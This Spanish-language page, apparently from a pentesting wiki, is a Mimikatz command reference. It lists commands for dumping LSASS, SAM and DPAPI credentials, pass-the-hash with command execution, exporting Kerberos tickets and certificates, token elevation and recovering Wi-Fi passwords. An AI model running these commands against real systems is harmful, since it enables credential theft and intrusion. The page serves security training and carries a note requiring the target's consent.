Mimikatz
Mimikatz es una herramienta popular entre los hackers, ya que puede recuperar contraseñas almacenadas en texto claro o en forma de hash. Tiene un montón de opciones para extraer información.
Última actualización
¿Te fue útil?
Mimikatz es una herramienta popular entre los hackers, ya que puede recuperar contraseñas almacenadas en texto claro o en forma de hash. Tiene un montón de opciones para extraer información.
Última actualización
¿Te fue útil?
Nota: Este tipo de técnicas son muy invasivas, ya que vamos a conseguir información sensible, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo
privilege::debug
: Este comando se utiliza para habilitar la depuración en el proceso actual, lo que permite a Mimikatz obtener acceso a las credenciales del sistema.
sekurlsa::logonPasswords
: Este comando se utiliza para recuperar las contraseñas almacenadas en el archivo LSASS.exe, que es el proceso responsable de la gestión de credenciales en sistemas Windows.
lsadump::sam
: Este comando se utiliza para recuperar las contraseñas almacenadas en el archivo SAM, que es la base de datos de cuentas locales en sistemas Windows.
lsadump::cache
: Este comando se utiliza para recuperar las credenciales almacenadas en la caché de credenciales del sistema.
lsadump::secrets
: Este comando se utiliza para recuperar las credenciales almacenadas en el archivo SYSTEM, que es un archivo que contiene información sobre la configuración del sistema.
token::elevate
: Este comando se utiliza para obtener privilegios elevados en el sistema actual.
privilege::debug
Habilita los privilegios de depuración en el contexto actual.
privilege::getprivs
Muestra los privilegios disponibles en el sistema.
sekurlsa::logonpasswords
Muestra las contraseñas en texto plano almacenadas en LSASS (Local Security Authority Subsystem Service).
sekurlsa::tickets /export
Enumera los tickets de Kerberos en el sistema y los exporta a un archivo.
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlmhash>
Realiza un Pass-the-Hash (PTH) con el hash NTLM proporcionado.
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlmhash> /run:<command>
Realiza un Pass-the-Hash (PTH) y ejecuta un comando utilizando las credenciales obtenidas.
sekurlsa::wdigest
Muestra las contraseñas almacenadas en LSASS en formato WDigest.
sekurlsa::ekeys
Muestra las claves de cifrado de Kerberos almacenadas en LSASS.
lsadump::lsa
Muestra información sobre la Política de Seguridad Local (LSA) del sistema.
lsadump::sam
Muestra las cuentas de usuario almacenadas en la base de datos SAM (Security Accounts Manager).
lsadump::secrets
Muestra los secretos almacenados en LSASS, como claves de máquina y otros datos sensibles.
lsadump::cache
Muestra las credenciales almacenadas en la caché de autenticación de Windows.
dpapi::masterkey
Muestra las claves maestras DPAPI (Data Protection API) almacenadas en el sistema.
dpapi::cred
Muestra las credenciales DPAPI protegidas almacenadas en el sistema.
dpapi::chrome
Muestra las credenciales guardadas por Google Chrome utilizando DPAPI.
dpapi::firefox
Muestra las credenciales guardadas por Mozilla Firefox utilizando DPAPI.
dpapi::ie
Muestra las credenciales guardadas por Internet Explorer utilizando DPAPI.
dpapi::credhist
Muestra el historial de credenciales de usuario protegidas por DPAPI.
crypto::capi
Enumera las claves y los certificados almacenados en el almacén de claves de Windows.
crypto::certificates /export
Exporta los certificados del almacén de certificados de Windows a archivos individuales.
crypto::keys /machine
Enumera las claves criptográficas de máquina almacenadas en el sistema.
crypto::keys /user
Enumera las claves criptográficas de usuario almacenadas en el sistema.
vault::list
Enumera los elementos almacenados en el Vault de Windows, como credenciales de Internet Explorer y Edge.
vault::cred /patch
Enumera las credenciales protegidas almacenadas en el Vault de Windows.
vault::cred /export
Exporta las credenciales protegidas almacenadas en el Vault de Windows a archivos individuales.
token::elevate
Intenta elevar los privilegios del token del proceso actual al nivel de "System".
token::list /export
Enumera los tokens de seguridad en el sistema y los exporta a un archivo.
misc::cmd
Ejecuta comandos en un símbolo del sistema.
misc::memssp
Carga el módulo MemSSP.dll para interceptar credenciales en memoria.
misc::screenshot
Toma una captura de pantalla del escritorio del usuario actual.
misc::wifi
Enumera los perfiles de Wi-Fi almacenados en el sistema y muestra sus contraseñas.